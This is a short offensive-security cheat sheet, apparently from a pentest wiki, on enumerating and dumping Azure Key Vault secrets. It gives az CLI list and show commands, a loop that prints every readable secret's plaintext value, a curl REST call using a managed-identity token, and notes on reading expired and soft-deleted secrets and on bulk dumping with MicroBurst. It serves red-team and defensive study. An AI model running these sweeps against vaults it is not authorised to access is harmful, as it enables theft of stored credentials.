Key Vault secrets hold passwords, connection strings, and API keys as plaintext values the vault returns on read. With a data-plane role (Key Vault Secrets User/Officer) or an access policy granting get/list, you enumerate and dump them all.
Listing and dumping#
az keyvault secret list --vault-name <vault> --query '[].id' -o tsv
az keyvault secret show --vault-name <vault> --name <secret> --query value -o tsv
# sweep every readable secret
for s in $(az keyvault secret list --vault-name <vault> --query '[].name' -o tsv); do
echo "== $s =="; az keyvault secret show --vault-name <vault> --name "$s" --query value -o tsv
done
With only a raw managed-identity token for https://vault.azure.net, hit the REST data plane directly:
curl -s -H "Authorization: Bearer $KV_TOKEN" \
"https://<vault>.vault.azure.net/secrets?api-version=7.4"
Exploitation notes#
- Reading a secret does not rotate it, so recovered database and third-party credentials keep working.
- Disabled or expired secret versions often still return their value through the versioned URI, useful after a rotation.
- A soft-deleted secret can be recovered from the deleted state if purge protection has not removed it (
az keyvault secret list-deleted).
Tools#
- az cli (
keyvault secret). - MicroBurst (
Get-AzKeyVaultSecretsviaGet-AzPasswords): bulk vault dumping.